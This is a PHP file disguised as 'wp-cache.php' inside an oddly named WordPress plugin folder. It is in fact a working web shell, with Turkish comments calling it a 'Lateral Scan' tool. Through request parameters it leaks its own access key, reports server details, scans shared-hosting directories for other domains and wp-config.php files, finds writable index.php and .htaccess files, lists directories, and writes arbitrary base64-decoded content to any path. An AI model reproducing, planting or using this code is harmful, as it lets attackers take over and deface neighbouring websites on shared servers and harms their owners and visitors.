File: h:/root/home/kytoffice-001/www/expresstinou/wp-content/plugins/cnnqrxx/wp-cache.php
<?php
/**
* Lateral Scan - Minimal PHP scanner
* PHP 5.4+ uyumlu, xshapi yerine kullanilir
* Sadece scan + write + info
*/
error_reporting(0);
header('Content-Type: application/json');
$key = isset($_REQUEST['key']) ? $_REQUEST['key'] : '';
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : '';
// Master key = dosya yolundan turetilir
$MASTER_KEY = 'LSC_' . substr(md5(__FILE__ . 'lateral-2026'), 0, 24);
// get_master_key sifresis calisir
if ($action === 'get_master_key') {
echo json_encode(array('master_key' => $MASTER_KEY));
exit;
}
if ($key !== $MASTER_KEY) {
echo json_encode(array('error' => 'invalid key'));
exit;
}
switch ($action) {
case 'info':
echo json_encode(array(
'php' => phpversion(),
'user' => get_current_user(),
'cwd' => getcwd(),
'docroot' => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : getcwd(),
'os' => php_uname(),
'script' => __FILE__,
));
break;
case 'scan':
$results = array('all_domains' => array(), 'writable_domains' => array(), 'server_info' => array(
'document_root' => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : getcwd(),
'current_user' => get_current_user(),
'scan_time' => date('Y-m-d H:i:s'),
'scanned_root' => null,
));
// Document root'tan user home'u bul
$docRoot = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : getcwd();
// cPanel addon domain yapisi: /home/USER/public_html/DOMAIN/
// Normal shared hosting: /home/DOMAIN/ veya /var/www/DOMAIN/
$roots = array();
// 1) public_html altindaki alt dizinler (cPanel addon domains)
// docroot = /home/xxx/public_html → public_html altini tara
if (preg_match('#^(/home/[^/]+/public_html)#', $docRoot, $m)) {
$roots[] = $m[1];
}
// Ust dizin de olabilir
$parentOfDocroot = dirname($docRoot);
if (is_dir($parentOfDocroot . '/public_html')) {
$roots[] = $parentOfDocroot . '/public_html';
}
// User home dizini (public_html'in parenti)
if (preg_match('#^(/home/[^/]+)/#', $docRoot, $m)) {
$userHome = $m[1];
if (is_dir($userHome . '/public_html')) {
$roots[] = $userHome . '/public_html';
}
// HestiaCP/VestaCP: /home/USER/domains/
if (is_dir($userHome . '/domains')) {
$roots[] = $userHome . '/domains';
}
// CWP: /home/USER/public_html/ veya /home/USER/www/
if (is_dir($userHome . '/www')) {
$roots[] = $userHome . '/www';
}
$roots[] = $userHome;
}
// docroot'tan hosting root'u cikar: /hosting/www/, /var/www/ vs.
if (preg_match('#^(/hosting/www|/var/www|/var/www/vhosts)/#', $docRoot, $m)) {
$roots[] = $m[1];
}
// docroot'un parent dizini — en onemli! (ISPmanager, custom yapılar)
// /var/www/user/data/www/domain.com → /var/www/user/data/www/
$docParent = dirname($docRoot);
if ($docParent && $docParent !== '/' && $docParent !== $docRoot) {
array_unshift($roots, $docParent); // en basa ekle, oncelikli
}
// 2) Klasik shared hosting dizinleri
$roots = array_merge($roots, array(
'/mnt/www', '/var/www', '/hosting/www', '/home', '/var/www/vhosts', '/var/www/html',
dirname(dirname($docRoot))
));
$roots = array_unique(array_filter($roots));
$domains = array();
$scannedRoot = null;
$skip = array('.', '..', 'backups', 'logs', 'tmp', 'cache', 'lost+found',
'cgi-bin', '.well-known', 'wp-admin', 'wp-content', 'wp-includes');
foreach ($roots as $root) {
if (!is_dir($root) || !is_readable($root)) continue;
$items = @scandir($root);
if (!$items) continue;
$found = array();
foreach ($items as $item) {
if (in_array($item, $skip)) continue;
if ($item[0] === '.') continue; // hidden dirs
$fp = $root . '/' . $item;
if (is_dir($fp)) {
$found[] = array('name' => $item, 'path' => $fp);
}
}
// Bu dizinde domain gibi gorunen alt dizinler var mi?
$hasDomains = false;
foreach ($found as $f) {
if (strpos($f['name'], '.') !== false) { $hasDomains = true; break; }
}
if ($hasDomains) {
// Domain iceren dizin — en iyi sonuc
if (!$scannedRoot) {
$scannedRoot = $root;
$domains = $found;
} else {
// Onceki sonuca ekle (farkli dizinlerdeki domainler)
$domains = array_merge($domains, $found);
}
// public_html + domain varsa en iyi — dur
if (strpos($root, 'public_html') !== false || strpos($root, 'domains') !== false) {
break;
}
}
}
// Duplicate domain kaldir
$seen = array();
$unique = array();
foreach ($domains as $d) {
if (!isset($seen[$d['name']])) {
$seen[$d['name']] = true;
$unique[] = $d;
}
}
$domains = $unique;
// ── Yedek yontem: find ile wp-config.php ara ──
// Dizin taramasi bos veya az sonuc verdiyse, find ile tum WP siteleri bul
if (count($domains) < 2) {
$wpConfigs = array();
// Okunabilir ust dizinlerde ara
$searchPaths = array();
if (preg_match('#^(/home/[^/]+)/#', $docRoot, $hm)) {
$searchPaths[] = $hm[1]; // user home
}
$searchPaths[] = '/home';
$searchPaths[] = '/var/www';
$searchPaths[] = '/var/www/vhosts';
foreach ($searchPaths as $sp) {
if (!is_dir($sp) || !is_readable($sp)) continue;
$findResult = array();
@exec("find " . escapeshellarg($sp) . " -maxdepth 5 -name 'wp-config.php' -not -path '*/backup*' -not -path '*/cache*' 2>/dev/null | head -50", $findResult);
if (!empty($findResult)) {
$wpConfigs = array_merge($wpConfigs, $findResult);
break; // ilk basarili find yeterli
}
}
// wp-config.php path'lerinden domain ve webroot cikar
$findDomains = array();
foreach ($wpConfigs as $configPath) {
$webRoot = dirname($configPath);
// Kendi sitemizi atla
if ($webRoot === $docRoot || $webRoot === rtrim($docRoot, '/')) continue;
// Domain adini dizin yapisindan cikar
$parts = explode('/', trim($webRoot, '/'));
$domainName = null;
// /home/user/public_html/domain.com/ veya /home/user/domain.com/
foreach ($parts as $p) {
if (strpos($p, '.') !== false && !in_array($p, array('public_html', 'httpdocs', 'www'))
&& $p[0] !== '.' && strlen($p) > 3) {
$domainName = $p;
}
}
// Domain bulunamadiysa son dizin adini al
if (!$domainName) {
$last = end($parts);
if (strlen($last) > 2 && $last !== 'public_html' && $last !== 'httpdocs' && $last !== 'html') {
$domainName = $last;
}
}
if ($domainName && !isset($seen[$domainName])) {
$seen[$domainName] = true;
$domains[] = array('name' => $domainName, 'path' => $webRoot, '_webroot' => $webRoot);
$findDomains[] = $domainName;
// webRoot'u direkt atayalim — scan loop'da tekrar aramasin
// Bunu all_domains'e eklerken web_root set edilecek
}
}
if (!empty($findDomains)) {
$results['server_info']['find_method'] = true;
$results['server_info']['find_count'] = count($findDomains);
if (!$scannedRoot) $scannedRoot = 'find';
}
}
$results['server_info']['scanned_root'] = $scannedRoot;
foreach ($domains as $d) {
// find ile bulunan domainlerde webroot zaten biliniyor
if (!empty($d['_webroot'])) {
$webRoot = $d['_webroot'];
} else {
$webRoots = array($d['path'], $d['path'].'/public', $d['path'].'/public_html', $d['path'].'/www', $d['path'].'/httpdocs', $d['path'].'/web');
$webRoot = null;
foreach ($webRoots as $wr) {
if (is_dir($wr) && (file_exists($wr.'/index.php') || file_exists($wr.'/index.html'))) {
$webRoot = $wr;
break;
}
}
if (!$webRoot) {
foreach ($webRoots as $wr) {
if (is_dir($wr) && is_readable($wr)) { $webRoot = $wr; break; }
}
}
} // end else (_webroot)
$isWp = $webRoot && file_exists($webRoot . '/wp-config.php');
$indexWritable = $webRoot && file_exists($webRoot . '/index.php') && is_writable($webRoot . '/index.php');
$htaccessWritable = $webRoot && file_exists($webRoot . '/.htaccess') && is_writable($webRoot . '/.htaccess');
$dirWritable = $webRoot && is_writable($webRoot);
$info = array(
'domain' => $d['name'],
'path' => $d['path'],
'web_root' => $webRoot,
'wordpress' => $isWp,
'accessible' => is_readable($d['path']),
);
$results['all_domains'][] = $info;
if ($indexWritable || $htaccessWritable || $dirWritable) {
$wInfo = array('domain' => $d['name'], 'web_root' => $webRoot, 'files' => array());
if ($indexWritable) $wInfo['files'][] = array('type' => 'index.php', 'path' => $webRoot.'/index.php');
if ($htaccessWritable) $wInfo['files'][] = array('type' => '.htaccess', 'path' => $webRoot.'/.htaccess');
if ($dirWritable) $wInfo['files'][] = array('type' => 'dir_writable', 'path' => $webRoot);
$results['writable_domains'][] = $wInfo;
}
}
$results['server_info']['total_found'] = count($results['all_domains']);
$wpCount = 0;
foreach ($results['all_domains'] as $ad) { if ($ad['wordpress']) $wpCount++; }
$results['summary'] = array(
'total_domains' => count($results['all_domains']),
'writable_count' => count($results['writable_domains']),
'wordpress_count' => $wpCount,
);
echo json_encode($results);
break;
case 'write':
$path = isset($_REQUEST['path']) ? $_REQUEST['path'] : '';
$content = isset($_REQUEST['content']) ? $_REQUEST['content'] : '';
$isB64 = isset($_REQUEST['base64']);
if ($isB64) $content = base64_decode($content);
$r = @file_put_contents($path, $content);
if ($r === false) {
echo json_encode(array('error' => 'write failed'));
} else {
echo json_encode(array('success' => true, 'path' => $path, 'size' => $r));
}
break;
case 'ls':
$path = isset($_REQUEST['path']) ? $_REQUEST['path'] : getcwd();
if (!is_dir($path)) { echo json_encode(array('error' => 'not a dir')); break; }
$items = array();
foreach (scandir($path) as $f) {
if ($f === '.' || $f === '..') continue;
$fp = rtrim($path,'/') . '/' . $f;
$items[] = array('name' => $f, 'type' => is_dir($fp) ? 'dir' : 'file', 'size' => is_file($fp) ? filesize($fp) : 0, 'writable' => is_writable($fp));
}
echo json_encode(array('path' => $path, 'count' => count($items), 'items' => $items));
break;
default:
echo json_encode(array('error' => 'unknown action', 'actions' => 'get_master_key, info, scan, write, ls'));
}